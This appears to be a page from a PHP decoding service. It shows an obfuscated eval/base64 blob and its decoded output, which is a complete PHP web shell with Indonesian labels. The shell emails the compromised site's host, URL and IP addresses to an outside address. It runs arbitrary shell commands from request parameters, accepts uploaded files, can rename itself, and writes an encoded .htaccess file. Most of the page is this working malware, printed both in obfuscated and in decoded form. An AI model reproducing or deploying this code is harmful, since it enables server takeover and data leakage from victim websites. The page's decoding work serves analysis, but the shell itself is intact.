Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

eval(gzinflate(str_rot13(base64_decode('rUl6Rts4EP58nel/ELrMOJlPAnrpRCBZA4QjBZIQB9ryMh7FSW..

Decoded Output download

error_reporting(0);
if (!isset($_SESSION['bajak']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "Shell = Bispak";}
else {$security= "Shell = Kontol";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/info.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "Shell : Bispak";}
else {$security= "Shell : Kontol";}
echo "<title>SexCrime - Shell</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>Pengguna : id=".getmyuid().$cur_user." grup=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Sistem : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Perintah</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="Kentot"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Aplod File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>Nama baru: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Aplod"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Aplod Sukses ke ".$uploaddir.$name." Pantekk!! "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
elseif(isset($_GET['hta'])){
$drx = ".htaccess";
$hta = gzinflate(str_rot13(base64_decode('8y9XVi1FY1bNq9RkzMnJL+flArEV0oryZhUSZmVrucCiEL6hkbmeARAa8mXxZdm4cuakFitx5RcX6xVxFNjxZSkAgT/YOLAeHZBOEEQkM8Bz2uiDNdvBWsnJQqfckIKk/BLKWinKLy3JzCPfOQA=')));
$hndx = fopen($drx,"w");
fwrite($hndx,$hta);
fclose($hndx);
chmod($drx, 0755);
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}

Did this file decode correctly?

Original Code

eval(gzinflate(str_rot13(base64_decode('rUl6Rts4EP58nel/ELrMOJlPAnrpRCBZA4QjBZIQB9ryMh7FSW81tuRXMiQw/e+3ku2QFG19mfpY4t19aZ998VdHVyE9VhMhNeOj8ndy6/kzNlHlJaYU1eWS5zZdt9V2XzoD8pmMnetX5a/7589XN1kx7YuUeEdUqwAq3dIB/DWA3myzaokP+/2uathk+/jaqBn/vKDuNULPmmHfO+u1MoOBCKZggVZA0JTwEQIE9TW64sa1wXBwpsiQxqsBBdNqjDNiBCwdI/RvEUN0xn9zS073JVL9RzI9BfdhVaMIwLtZJXGMt74+f1MjUp82OhJciwiMeXEqEyrrEDAUVw+mnMS0PFjIyX69xv5+D6qUp1nHTVVj9D1Dr2zS6TfnQDFuRBkrFUkDIeS7KQmFqPoixssI2xLhcnxVFIvQrukH4SjUOtms1YoiTrmKUa5rq4tcKmKooZDzv+IIpC1bWyFOXLDElvOjfuftfSjTI4sXL3l92LBczMy/zf6l41SCRjMvc1yUVaVC5wfAZPdtrWHfO3UdN9uNk6ZwhyCgVzNHf7Da7+ydnTTbfa/X6fSd6yquMT4U1SRZzDRVmtUzZr+MMnwl4/uHU3LzdFNy825HwMgPBcLbmumI7rhnsidMWdEKsqbbtVm+PZA7JoXcawhjpNgdrb9RvoigM39i2AcMamNoFrGKt3iDGbgETy+FxtZkGUohPw8EQxR6heVXFUp+NlOX8tEo5QRFbk7dOounKQvAySxXFaORWZNPO/pJO0LtdG+6WXYaUFF5GuqltpmVUj/DlPuaCY6SW4iGzDD5t072VvlTlI1eKa0rLXIiR9nol52acCfPqpaMLqLcqioreFMhqUElVFNFBeOiufdmZTvWufypEEpKvxIDrL8fJA9xd+ZAzXGMb7MxoBFds04RsTWocLzzoy5XxjUJiwphM56kGul2T+tL04nGyBS5jv04wItNNx3E7E4v4pjwAKMbEqXwfgRQJTRAd4bdjrO1yJZPk6yXOI00WIjU1mElIJoU7IuUWVM/VaORUSJAByyiNpGaMX6UQsiCgPKcr8rYLxgMAZ+rzXyaSpyH3Mi8/S+JNokJGhCZYaJsFmYBWU4z+NptHojTW/MHIz8iV9U1TABxLGYdHuhMbHrCC9WdW6emYJdBhi0WdwoAEgTMefbk4TNLKkwaBSZ0A6B7q7AL2Hlc99IpV+Jcg501sqMYixvqct524BmD8pMQHSdeBoO1O3BGtW5lMn/Elck22yV0SYMO4ISkgUwNX0S2jkSmz4bGWseKKjSmsEe+aAb7q1i4puPx0hLCW+ir/eoeSDqf/aLU8KnYuuXKOLBUSL7fElbnx+hIMVOr9oHNrczS9+iE+nLjyWG3eZB3BosXScziARo/QxA5hwfF70UQv8Qh1KTgEMiJuZ5ITuT7Ryl7/sCLTMVqYyhUUdMy7EBCCr32qjwgir5s7QXUh7O27HlZ3348dHgHn9YG7S9ie+O7E/7++MUwd8jm+aqQ04vwzL2Iz3Lq77Hm8ZtjPIh2o9cgG/HHyVIQv/ZGMj5gbbLe8z++mZxCDtqfJxfuuDHq1z5ojhv08G+303mejkI2ae9epnm/HdzsfkP8/emXoT9hHY14u8dUHxg/Op6+bX+31x1pQRto2N72zhPywKQ2FIlM35DnMr61t6HhLRy5MLTGYNnkd4VjsUS50Lz7IdwmMhhN/XR9vTJ/W0+/0SMnRXUlIs6TevoP'))));

Function Calls

gzinflate	1
str_rot13	1
base64_decode	1

Variables

None

Stats

MD5	7399b322e6ce8c9a102825958df4f364
Eval Count	1
Decode Time	91 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats